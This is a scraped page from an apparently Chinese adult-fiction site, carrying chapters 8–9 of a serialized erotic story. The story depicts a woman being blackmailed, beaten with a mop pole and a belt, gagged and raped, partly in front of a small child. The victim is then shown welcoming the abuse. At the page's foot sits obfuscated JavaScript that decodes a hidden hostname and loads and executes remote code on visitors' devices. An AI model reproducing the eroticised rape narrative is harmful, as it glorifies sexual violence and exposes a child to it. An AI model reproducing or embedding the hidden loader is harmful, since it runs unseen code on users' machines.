返回

与同好分享熟妻美肉8-9作者美妻6ab

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com


字数:9000
前文链接:


(8)

淫靡的牌局终於进行完了,我和老王、老张三人都在妻子的阴道里发泄了一次自己的兽欲.白嫩丰满的妻子,身子横陈在两个老傢伙坐在沙发里的大腿上,圆润肉感的臀瓣窝落在两个可以做她父亲的老色狼裸露的长满腿毛的大腿间的沙发上。

两个老男人由於沾满妻子的淫液,而湿漉漉软趴趴的阳具紧贴着妻子温软的肩夹和大腿根部的美肉,两只粗糙褶皱的大手享受着我妻子柔软的乳房和湿滑的阴唇……

两个老傢伙一边用粗糙的手掌与指尖猥亵揉弄着我妻子柔软温暖的胴体,一边惬意地吸着烟,不时的与我这个他们大腿上一丝不挂的人妻的老公聊着天。我不时地回应着两个老傢伙的话题,看着他们大腿上被搓弄得不时呻吟的妻子,虽然尽量保持平静,但粗重的呼吸、发红的脸颊却出卖了我此时酸涩悸动的心情。
看着被两个老傢伙猥亵得娇吟不止的熟妻,我心里升起了一股无名的嫉火。
这个骚货,我只想三人一起去淫辱妻子,尽管我知道这也有我推波助澜的原因,但是此时我已被欲火蒙蔽了心智,只想随着自己心里的欲望去释放自己的欲火。

我拧灭指尖的烟头,霍然起身,迈步来到两个老傢伙坐着的沙发前,在他们三人疑惑的目光里,我把一条大腿跨在搂着妻子上身的老王毛茸茸的大腿外侧,膝盖弯曲,右手托着妻子秀发散乱的脑后,左手扶着由於插弄妻子阴道而沾满妻子淫液和两个老傢伙腥臭精液的怒涨鸡巴,粗鲁地捏开妻子性感的红唇,把沾满男女体液的鸡巴插进了妻子的檀口中。

在妻子无辜惊愕的目光里,我左手扶着沙发靠背,快速的挺动着腰部,粗鲁地操弄起妻子的美嘴。「你这个骚屄,贱货,让野男人玩得爽吗?好好的给我裹鸡巴!啊……真他妈会裹!」

我用言语和行动淫辱着爱妻,妻子的头部在老王的大腿上左右晃动,美目里由於口嘴被插,渗出了晶莹的泪水,目光里充满了渴求,好似祈求我停止对她的淫辱,口中无助的「呜呜……」不止。两个老傢伙短暂的愕然后,心有灵犀的对视着笑了,而手上却加紧了刺激妻子敏感区的动作,配合着我对妻子的奸淫。
客厅柔和的灯光下,在长条沙发里,妻子被我和两个老男人肆意地玩弄着,妻子无助的呻吟透过客厅的窗口,融入了哈市初夏繁星闪烁的夜空……

客厅中充满了男女粗重的喘息声,妻子蜷伏在两个老傢伙的腿间,丰满的乳房高低起伏,唇边还残留着一抹诱人的精液痕迹.我也坐在沙发的拐角上,擦拭着额头的汗珠,双腿大大分开,湿漉漉的鸡巴还滴落着精液,软软的垂在腿间.
老王搂着妻子泛着珍珠光泽圆润的肩头,打了一个哈欠,对着我说道:「兄弟,岁数大了,呵呵,你张哥明天还要走,今天就到这里吧!」我也感觉差不多了,於是点点头,与两个老傢伙客气一番后,等着妻子在浴室洗漱完,换上来时的衣服,一起携着手下楼打车回家。

时光如水,岁月如歌,转眼离在老王家里的淫乱就过去了十多天,妻子在经历了由蛹化蝶的转变后,从穿着到性格都更加性感迷人了,我也努力地在各方面关爱着包容我的妻子。期间老王在网上约了我们夫妻几次,但由於生意等的原因都没能成行,我也感到淫妻只是生活里的零食,偶尔品嚐还有新意,当正餐吃却不行了,毕竟淫妻的初衷是因为爱而不是伤。

哈市这几年冬天冷,夏天热,虽然还没有进六月,但气温已经接近三十摄氏度了。这天下午快闭店了,我在初夏的阳光下昏昏欲睡的和老王在网路上品评着最近四合院的文章,妻子则拿着帐本在楼层的商户间齐着帐。

妻子由於外表漂亮、为人可亲,所以在市场里人缘很好,收帐的事一般都是妻子出面。妻子回来搂着我吻了一下,又去货架后整理明天的货品,看着妻子在货架后来回扭动着的被包臀裙包裹着的美臀,我又可耻的硬了。呵呵!

这时QQ的图示不断闪动,老王发来讯息:「兄弟,今晚有空吗?和老哥去网吧呀!」

「网吧?老哥,你家不是有电脑吗?」

「呵呵,到了再告诉你。」

反正晚上也没事,我也想看看老王是什么意思,於是和他约好了时间地点,与妻子打过招呼后,拿着背包走出了自家的商铺.

刚走到楼层的滚梯附近,迎面一个高瘦的男人和我打了个招呼:「赵哥,出去呀?你家闭店了?」我抬头一看,原来是道外一家饭店的採买,姓刘,由於一次採购的过程里对妻子热情的态度很满意,所以就成为了我们店铺的回头客。他今年三十七、八岁,家是外地的,离婚后也没再找,自己在酒店附近租房住,长得高高瘦瘦,高挺的鼻樑长在他的长脸上让人一见就印象深刻,我对他印象最深的就是他腿间的一大坨,虽然隔着裤子,但是也总是高高的鼓起。

「哦,没有,你嫂子在店里盘货呢!怎么来得这么晚,有急用?」

「呵呵,可不是嘛,新换了个大师傅,非要一个牌子的豆豉,我这不赶紧来找吗?他妈的,他要不是老闆的亲戚,我非削他。操!」虽然来哈市好几年了,可这个小刘骨子里,外地人粗野的本质还是在不经意时流露出来。我安慰了他几句就踏上滚梯,下楼赴约去了。随着滚梯的滑动,小刘走向我家商铺的背影也逐渐消失在我的视线里.

************

我是三年前来到哈市打工的,一开始在工地开货梯,累得半死也挣不了几个钱,老婆在老家还跟一个收粮食的客商跑了,留下一个十五岁的儿子,现在和我一起在工作的饭店附近租房子住,后来在现在工作的这家饭店当服务员,和那个黑胖的老闆娘睡了一次后,她就把我提拔成了採买.操,那个骚屄,老公在外面包小的,她就在店里睡服务员.呵呵!

一次採买时,看到了赵哥的老婆,浑身肉,又白又嫩,特别是那个大屁股,真他妈够味。呵呵,每次来都见她穿得那么骚,要是能操一次,肯定他妈爽死,呵呵。今天我特意晚些来,一想起那个骚屄,鸡巴都刺挠。老天有眼,赵哥出去了,呵呵,阴暗的想法刺激着我,快步沿着已经没有几个人的走廊,向着赵哥家的店铺走去。

我进门后眼前没人,货架后面传来货物翻动的声音,我探头瞅了瞅空空荡荡的走廊,由於大部份商铺都已经闭店了,所以楼道里的照明也关上了,只有透过不多的窗口透进阳光,更让楼道显得冷清。

这个环境更激发了我心里压抑的欲望,一想到女人腿间屄里的骚味,更是刺激得我浑身激动得发抖。操,女人都是他妈的贱货,管他呢,城里白嫩的女人,我还没嚐过呢,凭什么城里人能操,我就不可以?今天我就要玩玩城里的大白屁股!一边想着,我一边把闭店的牌子挂在门外的扶手上,然后向着里面货架后的库房走去。

清姐正坐在货品箱上休息,黑色的半袖包臀短裙、黑丝袜、短跟高跟鞋,栗色的长发挽在脑后,由於搬动,丰满的奶子高低起伏,脸颊泛着红晕,裙摆下露出的丰满圆润的大腿让我不停地咽着口水。

清姐看到我进来,起身热情的打着招呼:「小刘呀,怎么这么晚过来了?」
我吞咽着口水,一步步向着这个城里的白嫩娘们走了过去……清姐被我直楞的眼神和粗重的喘息吓得步步倒退:「小刘,你这是干啥呀……」

「骚屄,我要操你!」我一边说着,一边解开了腰带,快速的脱掉裤子和皮鞋,全身上下只剩下T恤衫和脚上黑色的棉袜,粗大的鸡巴散发着尿骚味挺立在腹前,随着我的迈步不停地晃动着,马眼里已经渗出透明的液体.

我一把抱住退到货架边缘的清姐,用我的双臂紧紧地搂着这个城里白嫩娘们的肉体,粗鲁地用我佈满鬍碴的嘴唇亲吻、磨蹭着我所能碰到的每一寸肌肤.我的鸡巴紧紧地贴在她的腹前,随着清姐的扭动,来回地摩擦着她柔软的大腿。
我把清姐扳倒在库房的複合地板上,学着A片里的样子,把她的丝袜撕得满是窟窿,粗暴地揉捏着露出丝袜的嫩肉,这个骚屄穿的竟然是黑色的蕾丝内裤。
我麻利地扒下她的内裤,然后骑在她的腰部,任凭她在身下来回地扭动,把包裹着骚屄的内裤放在鼻子下贪婪地闻着女人的尿骚和屄里的味道。

「操你妈的,你再动,老子掐死你。操!」

清姐被我的威胁吓得停止了无助的扭动,在我身下低声的抽泣着。我得意地站起身,坐在旁边的货箱上,点燃一支烟,享受的吸着。

「操你妈的,自己把高跟鞋穿上,然后到窗口扶着窗台,把屁股撅起来。快点,你妈了个屄的!」

清姐在我打了她一个耳光后,顺从地穿上了踢掉的高跟鞋,然后扶着库房临街的窗台,白嫩的屁股高高的撅了起来。

「操你妈的,你是死人呀?给老子扭扭你的骚屁股。你妈的,贱屄!」
清姐在下午的阳光下,左右地扭动着她的骚屁股,随着动作,裙子退到了她丰满的腰际,肥厚的阴唇暴露在我淫邪的目光里……

(9)

今天我的运气真是太他妈好了,看着赵哥的老婆,在我眼前扶着窗台,撅起白嫩的肥屁股来回的扭动,我的心里在来哈市打工后,第一次充满了满足与自豪的感觉.

赵哥家的商铺在大楼的四层,由于整栋大楼设计的窗口很少,所以楼内的照明基本依靠灯光,赵哥家商铺里间的库房,只有一扇一米见方的塑钢窗,主要用于通风换气,现在赵哥的老婆清姐就双手扶着这扇窗户的大理石窗台,在我的胁迫下,骚浪的在我这个老公以外的男人面前扭动着白嫩的大屁股.

因为刚才的撕扯,再加上腰部不断的扭动,赵嫂的包臀短裙已经退到了腰际,两条白嫩圆润穿着高跟鞋的大腿,在我的命令下,努力的分到最大程度,肉腿上的黑丝被我撕的满是漏洞,缠在赵嫂的腿上,更显得风骚无比.

我坐在赵嫂身后不远的货箱上,上身紧贴着身后的货架,只穿着袜子的双腿大大的劈开,胯下的鸡巴在双手的抚弄下粗涨的发紫,回想起刚进城时,就因为在公交车上,摸了一个城里娘们的屁股,而被车上的城里人唾弃的景象,现在的情景我做梦也想不到呀.操他妈的,老子今天一定要操翻这个骚逼,好好出出心里被城里人看不起的恶气.

我手里拿着货架旁边的拖布杆,对准赵嫂屁眼的位置,用力的扭着捅了一下,[操你妈的,骚逼,转过身来自己把裙子撩到腰上,给老子跳着扭。]

赵嫂被我突然的一捅,惊叫的啊了一声,由于趴的时间太久,一手扶着腰,慢慢的转过身来,祈求的对我说着:[好小刘,求你了,别再折腾嫂子了,你欠的货款,我和老公说给你免了,求你了。]

[操你妈的,告诉你,老子不差钱,就是要操城里人的娘们,你妈了个逼的装什么正经,告诉你老子同乡在三棵饭店看监控,有一次我和他在饭店监控室唠嗑,你这个骚货在电梯里被赵哥和男人玩,老子都看到了,你妈了个逼的,你要不把老子伺候舒服了,老子现在就去和市场里的人聊聊,你在饭店电梯里的骚样,操你不是老去跳广场舞吗,就那么撩着裙子给老子跳,快点,操你妈的。]
赵嫂被我说的漂亮的脸蛋红的诱人,呼吸急促,[别,小刘,不要,那嫂子以后没法做人了,嫂子跳,嫂子给你跳。],在我的淫威下,赵嫂幽怨的双手撩起裙摆,左右舞动着为我表演着香艳的广场舞。

啪,我手里的拖布杆用力的抽到赵嫂的肥臀侧面,[操你妈的,手再撩高点,你是啥告诉老子。]

赵嫂被我突然的袭击,打的一声惊叫,屁股侧面留下来一到淡淡的红印。
[啊,别打嫂子了小刘,嫂子再撩,再撩。]

赵嫂把裙子向上,努力的撩到了腋下,奶子以下丰满白皙的肉体,都暴露在了库房的骚臭的空气里.

[我是骚逼,我是骚逼,呜呜………],赵嫂一边呜咽着,一边不停的扭动着屁股,一边说着下流的话语。

[操你妈的,你就是一个婊子,谁都可以拖进玉米地里操逼的婊子,操你妈的。]

我脱光T恤和袜子,起身来到撩着裙子,扭动肉体的赵嫂身前,把赵嫂的手臂缠在我的肩头,我的双臂紧紧的搂着这个城里人的老婆,双手粗鲁的揉捏着赵嫂的屁股蛋,享受着怀里香嫩柔软的肉体,感受着手掌间的滑腻,直立的鸡巴伸入赵嫂的裙下,来回的享受着城里娘们腹部软肉温暖滑腻的触感。

[啊……嗯,使劲揉我吧,小刘,嫂子是婊子,你把嫂子拖进玉米地,强奸嫂子吧,啊……用你的大鸡巴在玉米地里强奸我这个婊子……]

[操你妈的,城里娘们就是香,真他妈舒服。]

我粗鲁的用嘴舔噬着,我舌头所能碰到的,这个城里人媳妇的每一寸肌肤,我的口水涂满了赵嫂的脸蛋,脖子,我又霸道的裹出赵嫂香甜的舌头不住的笋吸舔噬。

这时楼道里传来了,各家商户放卷帘门闭店的哗哗声,[小清,在吗?咱们一起走呀。]

一声女人的问话,打断了我和赵嫂的淫迷,我听出来,是赵哥商铺,旁边卖调料的李姐,赵嫂一愣,一阵紧张祈求的眼神,不断的向我示意,左右摇动柔软的肩膀,从我的怀里挣脱开,慌忙的脱掉高跟鞋,几下扯下大腿上残破的丝袜,把裙摆向下拉了拉,穿上高跟鞋,示意我别出声,然后从商铺里间向外走了出去,停在里外间的门口,身体背向我脸朝外,和站在商铺外间的李姐搭着话。

我从赵嫂的肩头向外望去,果然是旁边商铺的李姐,还领着一个五六岁的小女孩,正是李姐的姑娘,[哦,是李嫂呀,我还有些货没摆完,一会自己走,你家在群利,离市场远,你先走吧。]

[呵呵,你家小赵呢,也不说帮帮你,我们家你大哥也是一个德行,哼,这些老爷们………],李姐就是喜欢唠叨,一见赵嫂就聊开了,也不着急走了………

商铺的里外间,被一个半人高的货架分割开来,站在李姐的位置,只能看到赵嫂的上身靠在通往里间的小门前,李姐无论如何也不会想到,在她这个长相端庄,体态丰满的好姐妹身后的库房里,就站着一个高耸着散发着尿骚味道鸡巴的赤身裸体的男人。

我的鸡巴现在又涨又痒,顺着龟头的马眼,已经渗出了透明的液体,我小心的来到正在答对着李姐的赵嫂的身后,伸手揉捏住了她高耸的屁股,赵嫂浑身一颤,我感觉到这个娘们的屁股蛋上柔软的白肉都跟着一紧,赵嫂在经过短暂的惊愕后,又故作自然的和李姐聊着闲话,[操,骚货,都他妈这么能装,看我不弄死你。]

我心里充满了糟蹋赵嫂的快感,手部粗鲁的大力揉搓着她裙下的臀肉,我揉搓了一会,放手向后退了一步,喘息着,感觉赵嫂也松了一口气.呵呵,骚逼,哪有这莫容易放过你的。

我的双手突然放到赵嫂的裙摆两侧,一下把她的裙子推到了腰上,赵嫂的一只手背到身后,左右的摆推着,但是她还不敢动作太大,怕被李姐发现端倪,口中还在应付着李姐的唠叨,我得意的笑着用手捉住她背到身后的嫩手,霸道的用她的手指圈住我勃起的鸡巴,上下的套弄起来。

城里娘们的手就是嫩呀,真他妈舒服,在别人面前用赵嫂的嫩手手淫,使我感觉到了,一种从没有过的快感,操他妈的,不怪城里还有喜欢自己老婆给别人玩的,原来当着外人面,用女的手摸鸡巴,都他妈这莫刺激,操,还是城里的人会享受。赵嫂也仿佛认命了似的,逆来顺受的背着手,一边和李姐唠着磕,一边用她的小手为我套弄,抚摸着,涨的青紫的鸡巴。

操他妈的,手淫已经舒缓不了,我的欲火了,我把赵嫂的手推开,双手扶住赵嫂丰满的腰部,把赵嫂的屁股向后拉了一下,把鸡巴头对准赵嫂的阴唇中间,用力挺腰,啊,湿滑软暖,我骚臭的大鸡巴就插进了她的骚逼里,一直感觉碰到了一圈软肉才停住。

[哦……啊……],赵嫂失声叫了一下。

[妹子,怎么了,要不我陪你干完再走吧,别累着。]李姐看赵嫂脸色发红,
表情痛苦,关心的说着,接着就要往前走。

[不要,大姐,我,我,没事,刚才是鞋里的石子嗝了脚一下,我一会也走,你别过来了。]

赵嫂身后的我完全没有理会两个女人的对话,正在深浅高低的享受着赵嫂的滑逼,这个贱货逼里水真多呀,流的我俩交合的部位和大腿上都是赵嫂逼里流出的粘稠的半透明液体,我用手在她的大腿内侧抹了一把,把沾满淫液的手掌用舌头舔噬了一口,鲜鲜咸咸,真他妈好吃。

我在身后肆意的奸淫着赵嫂的骚逼,舒服的好像骑马驰骋在草原上,而赵嫂确要努力的压抑着自己的感觉,一面要极力装出自然的表情,以免引起李姐的怀疑.赵嫂幽怨的表现,更使我体会到了一种超越于一般做爱的快感,只想让这个被我鸡巴抽插的女人更加的难堪,更加的痛苦,我的快感就会越强烈,这种感觉是我从未体会过的。

我更加快速抽插深入着赵哥老婆的嫩逼,城里娘们的逼怎么了,现在也得给我这个打工的鸡巴操,哼,贱货,操软你。我握爪着赵嫂腰部的十指,已经深深的陷入了她腰部的嫩肉里,鸡巴快速的抽插着,感觉到股股的淫液顺着我的大腿贴着腿毛,不断的流下。

[妹子,那你忙吧,我走了,你也别太晚了。]

听到李姐的话语,我感觉到,赵嫂的逼里都是一松,[那大姐我就不送了,明天见。]

[妞妞,走了,回家了,哎,这孩子,又跑哪去了。]

这时我感到赵嫂的身子一震,头部扭向右侧,惊愕的看着,我从里顺着赵嫂的目光看去,一个小女孩正蹲在柜台里侧的地板上,歪着头看着我赤身裸体,抓着赵嫂的腰,我的胯下和赵嫂的屁股紧紧的贴着………

[哦,妈妈,我来了。]

一阵愕然过后,小女孩叫着越过柜台跑向李姐,这个小丫头不知何时跑进了柜台,[妞妞,和清姨说再见,咱们走了。]

[清姨,再见。]赵嫂木然的回应着小女孩的再见。

李姐牵着女儿的手走出了店门,看着李姐虽然已经四十八九岁了,孩子都有了俩个了,但是还圆润丰满的屁股,我不禁咽了口口水。

[妈妈,清姨为什么撅着屁股,被一个不穿衣服的叔叔,用身下的棒子插呀?]

[小孩子不许胡说,赶紧走,爸爸的车还在楼下等着呢。]

[我看到了………]空荡的楼道里传来了母女的对话。

清姐被羞的一下就挣脱了我的束缚,踉跄着向前跑去,我紧追两步,把赵嫂扑倒在离店门不远的复合地板上,[操你妈的,骚逼,敢跑。看我怎么玩你。]
我伸手按下了卷帘的开关,然后把赵嫂的裙子裙摆上翻,用力向她的上身扯去,在裙子的拉扯和束缚下,赵嫂的双臂直着举过头顶,脖颈以上和双臂都被紧窄的连身短裙束缚着。

一番折腾后,赵嫂白色的蕾丝奶罩,包裹着高耸的奶子,随着赵嫂急促的呼吸,起起伏伏的显露在我的眼前,我捡起赵嫂的内裤,一股女人下体的尿骚味直冲鼻子,我扒开束缚赵嫂头部的裙摆,把她的内裤团成团,一手掐着她的下巴,一手在她惊恐的目光里,把内裤塞进了赵嫂涂满口红的嘴里,然后我把她丰满的肉体翻了个身,跨步骑到她的腰上,低头毫无怜惜的用手和口撕咬揉搓起,赵嫂丰满白嫩的臀肉来,赵嫂被我凌辱的娇躯扭动,口中呜呜悲鸣不止。

我起身走到店铺角落的衣帽架前,从赵哥挂在这里的裤子上抽下一条皮带,挺立着鸡巴赤裸着走到手臂头部被束缚,趴在地上的肉体旁边,[操你妈的,骚婊子,老子还没爽,你他妈的就敢撤逼,今天老子给你长长记性,操。]

一寸多宽的黑色皮带,在赵嫂丰满的肉体上落下舞起,赵嫂口中呜呜不止,白皙的肉体在商铺乳白色的复合地板上来回的滚动,十几分钟后,我停止了凌辱,扔下了皮带,坐在老板椅子上大口的喘息着,胯下粗大的鸡巴骄傲的颤动着.赵嫂蜷缩着丰满香嫩的肉体趴在地板上瑟瑟发抖,一道道淡淡的红印包裹着成熟的身体。

[操你妈的,骚婊子,服不服,服了,就自己起来,把衣服脱光,到我腿中间跪着来。],赵嫂艰难的把困住双臂的裙子脱下,解开乳罩,踉跄着跪在我的腿前,

[给我手淫,操你妈的快点,老子鸡巴痒死了。],赵嫂顺从的用双手扶住和她眼部同高的粗大鸡巴上下套弄起来。

[上次在电梯里,别的男人亲你逼,赵哥不生气?嗯。]

[嗯,他喜欢看我被人操,他说比自己操我还舒服。]

在封闭的店铺里,我和为我手淫的赵嫂随意的交谈着,原来赵哥好这口,呵呵,别说,看着女人被别人操,我今天还真有些体会,确实是不一样的刺激.操,凭什么城里人能玩,我就不行,低头看着专心为我手淫的赵嫂,我嘿嘿的淫笑起来,这不就是我的女人吗?

被心中的想法刺激的性趣高涨,我豁然起身,粗大的鸡巴划着赵嫂的脸颊弹起,我推开老板椅,把赵嫂推到在地板上,双手扶着她圆滑的膝盖,双腿跪着,把家鸡巴插入了滑腻的骚逼,[嫂子,做我老婆好吗,给赵哥带个绿帽子,让他当王八,好吗?]

我快速的抽插着鸡巴,赵嫂在我猛力的操干下呻吟不止,[好,让他当王八,野老公,把老婆拖进玉米地糟蹋吧,在玉米地里,扒光我,强奸我,啊……逼麻了,啊……]

一股尿液从赵嫂的下体喷射而出,被温热腥骚的尿液射中的一刹那,我浑身一抖,鸡巴酥痒,一股浓稠的精液,射进了赵嫂的阴道深处………

我紧搂着怀里痉挛不止的肉体,躺在满地的尿液与体液的混合物里,享受着高潮后的余韵,赵嫂抬起红晕的脸庞,为我从抽屉里拿出一根黄鹤楼,体贴的插进我嘴里,[野老公,你看把我抽的可怎么穿衣服呀。]

[怎么,不喜欢。]

我揉着赵嫂的奶子头,抽着烟说:[呵呵,小心眼那样,喜欢,你抽我时,越用力,我的逼里就越痒,诶哟,老公,你轻一点揉奶头,疼,啊………]
赵嫂的骚样,和糟蹋别人老婆的刺激,使我低落的性欲又再次高涨,我在尿液遍地的地板上又一次翻身,提枪上马,[操你妈的,骚逼,以后和我一起回老家,在玉米地里,我找朋友糟蹋你,让他们尝尝城里的逼水什么味,哈哈。]
[来吧,让他们把你老婆拖进玉米地,在你眼前糟蹋,骚婊子给你带绿帽子,啊……操死我,操死我,野老公,用力操吧,啊,啊,啊………]

淫迷的一幕,一遍遍的在卷帘后商铺腥骚的地板上上演着………

手机的铃声打断了我弟四次勃起,还在赵嫂阴道里的耕耘,[喂,什么事。哦,哦,我知道了,在哪?,道外十四道街,月舞网吧,好了,嘿嘿,我,哦不是,我们一会去,谁,你嫂子,呵呵,好,见面聊。]

关闭手机,我大力的揉搓着赵嫂的奶子,[宝贝,穿上衣服,陪老公走一趟,嘿嘿。],看着一脸茫然的赵嫂,我的心里淫笑不以………

(待续)

评分
相关推荐
3.0分

3.0分 分享美妻 作者不详35b

3.0分

3.0分 [娇妻美臀](1-9) 作者:sexman3216de

3.0分

3.0分 【FUN享】【美女同事】【作者:好色滴羔羊】【完】d17

3.0分

3.0分 好东西要和好朋友分享完作者不详233

3.0分

3.0分 分享美丽的妻子-淫妻奸情4ef

3.0分

3.0分 双重强奸——人妻与美少女全作者d10

3.0分

3.0分 与美丽人妻一起除夕倒数 作者Sunray331

3.0分

3.0分 与美女同居的X日子作者不详f98

3.0分

3.0分 与未婚妻的同居生活(1)作者:Since~冰45a

3.0分

3.0分 与未婚妻的同居生活(1)作者:Since~冰-淫妻奸情8d1

3.0分

3.0分 爱妻的美与淫(1-2)作者:netfere-校园激情63a

3.0分

3.0分 【与45 岁美丽熟女的第一次】【作者:beingtempt】【完】44d

3.0分

3.0分 美女魔术师—骨肉分离 【完】(作者:不详)148

3.0分

3.0分 美貌前妻作者残局ee7

3.0分

3.0分 当同好遇上同好作者楚瑜8e7

3.0分

3.0分 (同人)善良的美人妻(加强版)(24)作者:aviva2005280


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};